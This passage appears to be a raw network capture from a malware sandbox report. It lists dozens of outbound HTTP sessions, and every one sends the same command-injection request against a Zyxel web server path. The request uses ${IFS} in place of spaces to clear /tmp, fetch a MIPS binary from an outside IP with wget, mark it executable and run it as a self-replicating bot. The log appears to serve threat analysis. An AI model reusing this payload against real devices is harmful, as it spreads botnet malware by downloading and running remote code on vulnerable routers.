                                                Jan 12, 2024 18:24:50.203175068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8065192.168.2.135425869.130.175.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203236103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8066192.168.2.1359914217.19.168.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203299999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8067192.168.2.1344050160.147.4.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203362942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8068192.168.2.1356098152.106.242.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203406096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8069192.168.2.135447023.23.8.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203444004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8070192.168.2.1354962198.222.100.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203541994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8071192.168.2.1353504210.177.132.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203576088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8072192.168.2.1353962164.29.223.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203609943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8073192.168.2.1352112115.239.189.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203660965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8074192.168.2.1347334143.59.95.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203752041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8075192.168.2.1338146207.14.184.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203788996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8076192.168.2.1337590151.249.235.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203843117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8077192.168.2.1360802211.124.212.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203913927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8078192.168.2.1359292129.76.100.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.203973055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8079192.168.2.134637613.113.209.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204035044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8080192.168.2.135595442.245.95.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204092979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8081192.168.2.135891479.34.61.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204164982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8082192.168.2.1350494201.231.67.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204232931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8083192.168.2.134659024.35.95.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204252958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8084192.168.2.1347610167.207.234.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204310894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8085192.168.2.135629647.213.113.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204375982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8086192.168.2.1350370163.240.119.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204420090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8087192.168.2.1341322223.236.67.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204458952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8088192.168.2.135204263.222.119.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204560041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8089192.168.2.1336080123.172.122.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204592943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8090192.168.2.1336460193.123.37.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204689026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8091192.168.2.1355228182.56.164.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204766035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8092192.168.2.1342056209.185.8.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204826117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8093192.168.2.1337140132.4.121.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204871893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8094192.168.2.1348964171.180.22.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204929113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8095192.168.2.1335902172.196.117.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.204961061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8096192.168.2.1333732184.156.61.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205044985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8097192.168.2.1346802207.62.8.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205060959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8098192.168.2.134178299.229.109.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205152035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8099192.168.2.135464249.125.198.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205207109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8100192.168.2.1339038185.141.77.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205271006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8101192.168.2.1357108160.111.151.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205331087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8102192.168.2.1357874222.124.95.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205375910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8103192.168.2.13377422.65.114.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205432892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8104192.168.2.133906479.4.203.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205499887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8105192.168.2.135388232.225.158.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205523014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8106192.168.2.1356904146.102.40.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205576897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8107192.168.2.134132677.100.209.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205615044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8108192.168.2.134865078.219.6.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205681086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8109192.168.2.1343332223.30.136.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205749989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8110192.168.2.1356468139.245.159.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205795050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8111192.168.2.1342846182.58.242.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205857038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8112192.168.2.1343358213.36.9.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205899954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8113192.168.2.1336198134.155.66.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.205948114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8114192.168.2.135565495.166.67.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206037998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8115192.168.2.1350562181.40.136.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206074953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8116192.168.2.1354870146.217.101.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206119061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8117192.168.2.135011824.7.46.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206186056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8118192.168.2.1335460191.224.198.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206249952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8119192.168.2.1341150129.8.144.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206298113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8120192.168.2.134537418.221.175.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206373930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8121192.168.2.135703867.125.1.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206418037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8122192.168.2.134146623.50.16.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206470013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8123192.168.2.1334424207.14.246.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206512928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8124192.168.2.133543641.41.124.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206567049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8125192.168.2.134843839.128.73.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206614971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8126192.168.2.13557422.1.92.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206669092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8127192.168.2.1339716109.72.38.202443
                                                TimestampBytes transferredDirectionData
